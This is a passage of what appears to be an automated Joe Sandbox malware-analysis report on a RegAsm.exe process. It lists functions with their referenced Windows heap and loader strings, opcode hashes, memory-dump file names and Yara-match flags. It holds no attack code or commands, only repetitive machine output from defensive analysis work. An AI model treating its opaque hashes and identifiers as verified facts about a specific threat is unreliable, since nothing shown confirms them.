                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                  • API String ID: 0-3591852110
                  • Opcode ID: 445e313a0f7ecb6749f215b334a10df83f862bbeff7e66118c92e0142b1fe5c5
                  • Instruction ID: ce188fb634ee347e6a3240b1d5cee474d470d5a91d59750a78db5017fa79baee
                  • Opcode Fuzzy Hash: 445e313a0f7ecb6749f215b334a10df83f862bbeff7e66118c92e0142b1fe5c5
                  • Instruction Fuzzy Hash: 3462CF70A00655DFEB28CF69C480A76BBF1FF49308B15909EEA868B751DB34E895CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                  • API String ID: 0-3316276410
                  • Opcode ID: 7d14326f968bc17aa9bcbbabb683916e658106efa2f8b074b337011ce582120c
                  • Instruction ID: ffb604f29107b4ebcfc09e9e30a081d0a22d60b8e9956bfb4ec658dfcb288315
                  • Opcode Fuzzy Hash: 7d14326f968bc17aa9bcbbabb683916e658106efa2f8b074b337011ce582120c
                  • Instruction Fuzzy Hash: FBF1F271500245EFEB28DF68C480FB6BBF5FF05718F04909AE9869B281DB34A999CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                  • API String ID: 0-3744532478
                  • Opcode ID: b468a18f96165391a8b5aa42852023659ddf9211875cb19e8c81e4be20fa442a
                  • Instruction ID: 0d19f6ebd89ebdceb5b2ffcf2f1811080da291af2b7973bbddb203eb3b10ae3c
                  • Opcode Fuzzy Hash: b468a18f96165391a8b5aa42852023659ddf9211875cb19e8c81e4be20fa442a
                  • Instruction Fuzzy Hash: 2EC1E5715002519FFB21EF64C845FAABBF1AF09B14F44804AF89E9B681CB34E895CF61
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: None%s$%08I64X: PC32 %08X -> %08X (target %p) %s$%08I64X: Unknown$%08I64X: VA32 %08X -> %08X %s$%08I64X: VA64 %016I64X -> %016I64X %s$ (padding)$(no change)$Invalid fixup information
                  • API String ID: 0-2431225500
                  • Opcode ID: c259fd40e13693c2643e0d6cea3d8540fb3b7b1ca7f1847b35db09db44d6eb91
                  • Instruction ID: 8d618099dd3a98133cb69b3cf2d5cfb71b688c1eb2a261ad917be6884995d81e
                  • Opcode Fuzzy Hash: c259fd40e13693c2643e0d6cea3d8540fb3b7b1ca7f1847b35db09db44d6eb91
                  • Instruction Fuzzy Hash: 9791B6B2E00615AFEF158E88C981A7A73B6EF8C714F15C16EE919AB381D670DD41CB90
                  Strings
                  • Status != STATUS_NOT_FOUND, xrefs: 023F3D6A
                  • Internal error check failed, xrefs: 023F3D79
                  • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 023F3D74
                  • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 023F3C08
                  • sxsisol_SearchActCtxForDllName, xrefs: 023F3BCE
                  • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 023F3BDF
                  • @, xrefs: 0239F3FE
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                  • API String ID: 0-4103935307
                  • Opcode ID: 0014aafe27a78da676299778022c37ae530d7b744fb84e69162ff3720a3e9b57
                  • Instruction ID: 58a94074857cd6bf4373d305b54e4dd0f4afd25b0b4a841c4d5d19b723c942d9
                  • Opcode Fuzzy Hash: 0014aafe27a78da676299778022c37ae530d7b744fb84e69162ff3720a3e9b57
                  • Instruction Fuzzy Hash: 83029D71A00209DFDB24CFA9D881ABEB7F5FF09704F10886EEA46EB651E7749945CB10
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-523794902
                  • Opcode ID: e09fb62140c1624a3d062fe29f22f7e25fbe03e9960f63e9abe59ceefaf9698c
                  • Instruction ID: 19199a3dd442ee7ab7accc9695c0ea94c1ddc59f1d67678c518a0d589bf94e9b
                  • Opcode Fuzzy Hash: e09fb62140c1624a3d062fe29f22f7e25fbe03e9960f63e9abe59ceefaf9698c
                  • Instruction Fuzzy Hash: 9432E271A00649EFDF21CF68C884FAAB7FAFF04314F148059E9568B691C770EA99CB51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$MZER$Status: 0x%08lx$d:\w7rtm\minkernel\ntdll\ldrfind.c
                  • API String ID: 0-1036130424
                  • Opcode ID: 9b2b6fba3d48ca174ae7573ce3200f4e75692fda1dc6fb450680c93516441bed
                  • Instruction ID: f7cd21e6d0687bed62f8f3706869b88c6d03bbd79fd45f3be1d6f53cd3746ff1
                  • Opcode Fuzzy Hash: 9b2b6fba3d48ca174ae7573ce3200f4e75692fda1dc6fb450680c93516441bed
                  • Instruction Fuzzy Hash: 11328C71900219EFDF22DFA4C890BEEBBBAFF09304F14442AEA55AB660D7719945CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: t$No t$No t$gfff$xNo t
                  • API String ID: 0-3710999693
                  • Opcode ID: df3833150d029f1345c82ef253ee1925298c6f3de58159f9f8a16fe9a58ed9a9
                  • Instruction ID: 79eae98314b9d069ccb8fde3888c1e334758bb645656b808d05711e7b441a657
                  • Opcode Fuzzy Hash: df3833150d029f1345c82ef253ee1925298c6f3de58159f9f8a16fe9a58ed9a9
                  • Instruction Fuzzy Hash: 68510176F0010A4BDF1C9A1ED99867EB792EBD4315F18823FD809EB7C0E6B89D518784
                  Strings
                  • HEAP[%wZ]: , xrefs: 023EDAA6, 023EDB8E
                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 023EDBA6
                  • HEAP: , xrefs: 023EDAB3, 023EDB9B
                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 023EDABE
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                  • API String ID: 0-1657114761
                  • Opcode ID: 854ac6eeeed2a1a4300bf7c8d30e5198dc2c35e275a209a728f01c85ab73d391
                  • Instruction ID: 6c533a1e888ef44a18970f45eba7a93d37f8d5031f363245fda4f8b3f603b460
                  • Opcode Fuzzy Hash: 854ac6eeeed2a1a4300bf7c8d30e5198dc2c35e275a209a728f01c85ab73d391
                  • Instruction Fuzzy Hash: 1A02C071A00616CFDB28CF69C4A4BBEB7F5FF44304F1981A9E4968B691D334E945CB90
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: VUUU$VUUU$gfff$gfff
                  • API String ID: 0-376493243
                  • Opcode ID: 36090a3c5a52c5104caeeaf5b8c5765a66c955ebf0aa078fa85b9b98f5dbeb93
                  • Instruction ID: a129a0cdf45be4d342c119fea746eaefdf986b686a7b77aad6b8a840f145e44c
                  • Opcode Fuzzy Hash: 36090a3c5a52c5104caeeaf5b8c5765a66c955ebf0aa078fa85b9b98f5dbeb93
                  • Instruction Fuzzy Hash: C8514631B000194BDB1CC95DDE987EEB666EFD4304F18817BD889EF3D5D9B89E418680
                  Strings
                  • HEAP[%wZ]: , xrefs: 023FA48B
                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 023FA4AC
                  • HEAP: , xrefs: 023FA498
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                  • API String ID: 0-2419525547
                  • Opcode ID: 0bcae9a21d209022c910a9c05a1cd5142510cffc7edef1e09f9ed26a07617c09
                  • Instruction ID: 1e27bd30db8fe82031ac788fa0a6c6a8b48314a945580a34dbe8e3d67a36acae
                  • Opcode Fuzzy Hash: 0bcae9a21d209022c910a9c05a1cd5142510cffc7edef1e09f9ed26a07617c09
                  • Instruction Fuzzy Hash: 31C28A756042128FCB58CF19C494A7A77B2FF84314B2AC1ADED9A9B796D730EC41CB90
                  Strings
                  • HEAP[%wZ]: , xrefs: 023FACB5
                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 023FACD9
                  • HEAP: , xrefs: 023FACC2
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                  • API String ID: 0-2419525547
                  • Opcode ID: 0ae5af29ee000bbec21c209e36ae5c384cfa611caa11ab5c847f9a2a9f7fbb86
                  • Instruction ID: fb86d438b80a8f02433535cb2909277ec9b17850d1442d7bb2c73333e92fea72
                  • Opcode Fuzzy Hash: 0ae5af29ee000bbec21c209e36ae5c384cfa611caa11ab5c847f9a2a9f7fbb86
                  • Instruction Fuzzy Hash: 39A2C170A04255CFDB29CF69C4A0BA9B7B6FF48304F1485AEE9869B696D730E841CF50
                  Strings
                  • HEAP[%wZ]: , xrefs: 023FDC0F
                  • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 023FDC30
                  • HEAP: , xrefs: 023FDC1C
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                  • API String ID: 0-212623055
                  • Opcode ID: 7872464f97dc987a28667a4bd98bff7b1b63df4e757c79af2648b3f65f83ef68
                  • Instruction ID: 988f46f0a60827cca0d3b9f6a69f22700e716dbdedc47dc879bf90844cd353a2
                  • Opcode Fuzzy Hash: 7872464f97dc987a28667a4bd98bff7b1b63df4e757c79af2648b3f65f83ef68
                  • Instruction Fuzzy Hash: F8720171900259DFDB25CF69C854BBEBBF5FF09304F04846AE996AB692D334A841CF60
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                  • API String ID: 0-2419525547
                  • Opcode ID: 16bc55ea96417455d4ffe3f51ead80a4d136149ba5a99f7f8238aad0e7b495ba
                  • Instruction ID: 052a9851b07175cbc6e0ea3470ad589f60d966cbd5e39a64e8dcbb561f05e293
                  • Opcode Fuzzy Hash: 16bc55ea96417455d4ffe3f51ead80a4d136149ba5a99f7f8238aad0e7b495ba
                  • Instruction Fuzzy Hash: 1372AC70A00215DFDB68CF14D490BBAB7B6FF89714F1580AEE94A8B792D730E941CB91
                  Strings
                  • HEAP[%wZ]: , xrefs: 023FD639
                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 023FD65A
                  • HEAP: , xrefs: 023FD646
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                  • API String ID: 0-2419525547
                  • Opcode ID: ab7983c419882b64307bff9a5761efe7fe6c5f7b2aa903994b5f602b0e2d2861
                  • Instruction ID: 8949f2dd9fe86f7c4080f7c24f8e5d6b20f7f646fe090d0ddcdcf1829449ee74
                  • Opcode Fuzzy Hash: ab7983c419882b64307bff9a5761efe7fe6c5f7b2aa903994b5f602b0e2d2861
                  • Instruction Fuzzy Hash: EF021570600245DFCB68CF28D4A4BBABBF5FF44305F14886EE9968B686D734E954CB50
                  Strings
                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 023F9636
                  • HEAP[%wZ]: , xrefs: 023F9616
                  • HEAP: , xrefs: 023F9623
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                  • API String ID: 0-385592399
                  • Opcode ID: 8c3f77bb25bbe52f25269e53d85ebcc441cd4a69df91ed04c31187006ec87f38
                  • Instruction ID: a047c4d2286122410c18f55fb62dba10c70d5749485c63e561e42c2192025592
                  • Opcode Fuzzy Hash: 8c3f77bb25bbe52f25269e53d85ebcc441cd4a69df91ed04c31187006ec87f38
                  • Instruction Fuzzy Hash: D3D1FE71A00656DFDB24CF69C481BBAB7F9BF88304F2481A9E6569B685C734ED01CF50
                  Strings
                  • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 02402D1F
                  • HEAP[%wZ]: , xrefs: 02402D07
                  • HEAP: , xrefs: 02402D14
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                  • API String ID: 0-1596344177
                  • Opcode ID: 51f3641fba7d242fb5f251a52ee93cdd89116c199270550427f355eca1564a84
                  • Instruction ID: 6ca7e4d5818f1b6d6c559b88bb29a1055baae1e7dccb0b44e3654c4365c59530
                  • Opcode Fuzzy Hash: 51f3641fba7d242fb5f251a52ee93cdd89116c199270550427f355eca1564a84
                  • Instruction Fuzzy Hash: 39B1A031610615DFCB29CF28C4D4AB9B7F1FF49314B1586A9E99A8FA82D730E984CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: t$No t$xNo t
                  • API String ID: 0-3771234843
                  • Opcode ID: 16cc35296608a49f3542cc11efa7bfbe24bf74c4019bd13c282f857cd52c5884
                  • Instruction ID: 1c11de2b527cf5f515584f568d98c9bd500309fefd38d07ee94318d3648f1f9d
                  • Opcode Fuzzy Hash: 16cc35296608a49f3542cc11efa7bfbe24bf74c4019bd13c282f857cd52c5884
                  • Instruction Fuzzy Hash: 9F512776F000094BDF0C9A1DC95967EB6A3EBD4314F18823ED806EB7D1E6BC9D418784
                  Strings
                  • HEAP[%wZ]: , xrefs: 024258D7
